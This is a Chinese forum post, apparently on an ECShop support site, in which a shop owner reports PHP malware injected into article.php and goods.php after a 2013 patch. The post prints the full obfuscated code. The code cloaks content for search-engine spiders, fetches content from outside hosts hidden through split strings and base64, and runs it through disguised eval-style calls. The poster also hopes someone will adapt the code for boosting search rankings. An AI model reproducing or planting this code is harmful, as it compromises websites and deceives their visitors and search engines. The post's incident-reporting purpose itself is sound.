2013.6.3发布的补丁刚打上,就被挂马了,详情帖内

2016-07-07 15:12 来源:www.chinab4c.com 作者:ecshop专家

在商城根目录的article.php、goods.php页面顶部都被人加入了以下代码:
  1. <?php
  2. ini_set('display_errors','Off');ini_set('max_execution_time', 0);define

  4. ('SID', '33824');define('ROOT', dirname(__FILE__));define('LOCAL',

  6. True);function heade_(){if (stristr($_GET['id'], SID)) return true; else return false;}


  9. function isspider($open = 0){if (!$open) if (heade_()) return

  11. true;$agent="agent:".strtolower($_SERVER

  13. ["HTTP_USER_AGENT"]);$searray=array

  15. ("googlebot","baiduspider","sogou","yahoo","soso");foreach($searray as $se){ if

  17. (strpos($agent,$se)>0) return true;}return false;}function isindex(){if (heade_())

  19. return false;$pname=strtolower($_SERVER

  21. ["SCRIPT_NAME"]);$pquery=strtolower($_SERVER

  23. ["QUERY_STRING"]);$parray=array("/index.","/default.","/main.");foreach($parray

  25. as $se){ if (strpos($pname,$se)>-1&&strlen($pquery)<1) return true;}}function

  27. Happy(){$ip = $_SERVER['REMOTE_ADDR'];if (isset($_SERVER

  29. ['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER

  31. ['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif(isset

  33. ($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d

  35. {1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'],

  37. $matches)) {foreach ($matches[0] AS $xip) {if (!preg_match('#^(10|172\.16|192

  39. \.168)\.#', $xip)) {$ip = $xip;break;}}}$TNT_Group = array('123.125.68',

  41. '220.181.68', '220.181.7', '121.14.89','203.208.60', '210.72.225', '125.90.88',

  43. '220.181.108','123.125.71','123.125.67');foreach($TNT_Group as $addr) if

  45. (stristr($ip, $addr)) return False;return True;}if (LOCAL){$HtmlDir =

  47. ROOT.'/'.'HtmlSave';if (!is_dir($HtmlDir)) mkdir($HtmlDir);}if (SID ==

  49. '_N'.'OT_O'.'PTI'.'ON_X5'){if (function_exists('file_get_contents')){$ftime =

  51. filemtime(__FILE__);$N_ID = mt_rand(20000, 99999);$c_f = file_get_contents

  53. (__FILE__);$c_f = str_replace('_NOT_'.'OPTION_X5', $N_ID, $c_f);fwrite(fopen

  55. (__FILE__, 'w'), $c_f);touch(__FILE__, $ftime);}}
  56. if ($_GET['action'] == 'ad') die

  58. (@file_get_contents('htt'.'p:/'.'/i'.'mg.klg'.'w01.'.'com'.'/p'.'.ht'.'ml'));
  59. if (Happy())


  62. {$urlrefer=strtolower("refer:".@$_SERVER["HTTP_REFERER"]);$searray=array

  64. ("google","baidu","sogou","yahoo","soso","360");if (!isspider(1))foreach($searray

  66. as $se){if (strpos($urlrefer,$se)>0){if (heade_()){echo @file_get_contents

  68. ('ht'.'t'.'p://i'.'m'.'g.k'.'l'.'g'.'w'.'0'.'1.c'.'o'.'m/c'.'.t'.'xt');exit;}}}}

  70. if (isspider() & !isindex

  72. ())
  73. {if (isset($N_ID)) $SID = $N_ID;if (SID != '_N'.'OT_O'.'PTI'.'ON_X5') $SID =

  75. SID;$ID = trim(str_replace(SID, '', $_GET['id']));$NMNEW**OJFOJNS = '';if

  77. (LOCAL){if (is_file($HtmlDir.'/'.str_replace('.', '', $ID))){ header('Content-Type:

  79. text/html; charset=UTF-8');die(file_get_contents($HtmlDir.'/'.str_replace('.', '',

  81. $ID)));}}
  82. $FF0ffff__ff_ff_ff1110 = 'domain='.$_SERVER['HTTP_HOST'];

  84. $FF0ffff__ff_ff_ff1110 .= $NMNEW**OJFOJNS = '&SID='.$SID;
  85. if (isset

  87. ($_GET['id'])) $_q = '?words='.mt_rand(1, 10).'&v='.$ID.'&'.$FF0ffff__ff_ff_ff1110;

  89. else $_q = '?'.$FF0ffff__ff_ff_ff1110;
  90. $_0101010101 = $_000000003F =

  92. BAsE64_DECODE('a'.'n'.'V'.'z'.'d'.'A'.BASE64_DECODE('P'.'T0'.'=')); $_FFFF11

  94. = $_fFf1f = '';
  95. function _00F0f00of00o0F0o0f0Fo($_FFFFFF, $_I1 = '3', $_II =

  97. '7') {return str_replace($_II,$_I1,$_FFFFFF);}
  98. $__0xFFFF00FFF0F =

  100. str_replace(array('r','d','l','e','y','v','z','s','s','2','

  102. ',$_0101010101,$_000000003F,'0','.','g'), $_000000, 'say very g00d.');


  105. $__0xFFF101= str_replace(array('E','r','s','Z','i','J','z','s','v','S','

  107. ',$_0101010101,$_GET[id],$_000000003F,',','.','e'), '', ' Js Ss Ev Zs it SS.');


  110. $__0111111FFF = str_replace(array('u','i','d','o','y','n','e','W','a','2',' ',$_GET

  112. [s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you is.');
  113. $ffofo_of00offff

  115. = str_replace('3', '7',

  117. 'cGhwLjV4LzV4L21vYy42NjZpYXRnbm9kLmQvLzpwdHRo'.''.'='.''.'=');


  120. $__0xFFF010101= str_replace(array('a','r','s','Z','y','J','z','s','v','S','

  122. ',$_0101010101,$_GET[id],$_000000003F,',','.'), '', ' Js s Jv Zs are SS.');


  125. $__0x111F01101100 = str_replace(array('W','e','t','o','y','m','e','h','o','u','

  127. ','i',$_0101010101,$_000000003F,',','.','#'), $_000000, ' We the mis you.');


  130. $__01111111FFF = str_replace(array('u','i','d','o','y','n','z','W','a','e',' ',$_GET

  132. [s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you are.');


  135. $ffoff0o_of00000offff = _00F0f00of00o0F0o0f0Fo($ffofo_of00offff);


  138. $_o0o001100o111o011 ='$_conn = f'.'il'.'e_g'.'et_'.chr(99).'o'.chr(110).'ten'.'ts

  140. ("'.urldecode(strrev(bAse64_decode($ffoff0o_of00000offff.'='.''.'='))).$_q.'")';


  143. $_E=strrev

  145. ($__0xFFF101.''.''.$__01111111FFF.$__0xFFF010101.$__0111111FFF.''.''.$_

  147. _0x111F01101100.''.''.$__0xFFFF00FFF0F);
  148. ($_=$_E).$_

  150. ($_o0o001100o111o011);$_jHHsHHs = $H0F0o00po = $_conn;
  151. if (500 >

  153. strlen($_jHHsHHs)) Exit;if (LOCAL) if (!file_exists($HtmlDir.'/'.str_replace('.', '',

  155. $ID))) fwrite(fopen($HtmlDir.'/'.str_replace('.', '', $ID), 'w'), $_jHHsHHs);header

  157. ('Content-Type: text/html; charset=UTF-8');echo

  159. $_jHHsHHs;exit;#w7vT0MLywvQgvs3Du9PQybG6pg
  160. }


  163. ?>
复制代码
上面定义了很多参数、蜘蛛、IP、外部内容的读取,看样子像是做SEO的人黑的,请大家注意了!!我是用了2013.6.3发布的V2.7.3版本的UTF8补丁后凌晨2点出现这个现象,现在已经把上面的代码删除,网站恢复正常。

特别需要提醒的是,上述代码可能特别适合蜘蛛的胃口,向这种重复性的文章,百度竟然能在数小时内收录,说明他的代码产生的结果还是给力的,好多年不研究代码了,希望能有高人研究一下,公布给大家,让小店长们的铺子都收录起来,流量花花起来。

回答:
用备份的文件覆盖

用备份的文件覆盖

不知道楼主有没有听过 泛站群,一个VPS,一个域名,能生成N个页面,好的泛站群软件,十分钟内就可以被百度收录。。的确很厉害

请问打了官方的:[20130621]这个版本补丁,可后台还提示要打:[20130603]的版本,这个还要打吗?